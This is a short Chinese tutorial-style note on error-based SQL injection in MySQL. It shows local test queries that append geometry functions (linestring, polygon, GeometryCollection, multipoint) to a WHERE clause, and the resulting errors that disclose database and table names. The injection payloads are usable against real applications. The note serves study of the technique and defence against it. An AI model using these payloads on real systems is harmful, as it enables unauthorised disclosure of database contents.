mysql空间数据库用于储存一些几何空间数据(mysql官方文档参考),可以利用其中的几何属性函数进行报错注入
mysql> select * from users where user_id=1;
+---------+------+------------+
| user_id | user | password |
+---------+------+------------+
| 1 | test | zheshimima |
+---------+------+------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id=1 and linestring(user_id);
ERROR 1367 (22007): Illegal non geometric '`test`.`users`.`user_id`' value found during parsing
mysql> select * from users where user_id=1 and polygon(user_id);
ERROR 1367 (22007): Illegal non geometric '`test`.`users`.`user_id`' value found during parsing
mysql> select * from users where user_id=1 and GeometryCollection(user_id);
ERROR 1367 (22007): Illegal non geometric '`test`.`users`.`user_id`' value found during parsing
mysql> select * from users where user_id=1 and multipoint(user_id);
ERROR 1367 (22007): Illegal non geometric '`test`.`users`.`user_id`' value found during parsing
我这里本地测试发现下面这四个函数可以使用 linestring() polygon() geometrycolection() multipoint() 从官方文档中可以发现这些函数都是对空间几何值进行操作,当出现非法的非几何值就会报错,可以直接爆所在数据库名,表名
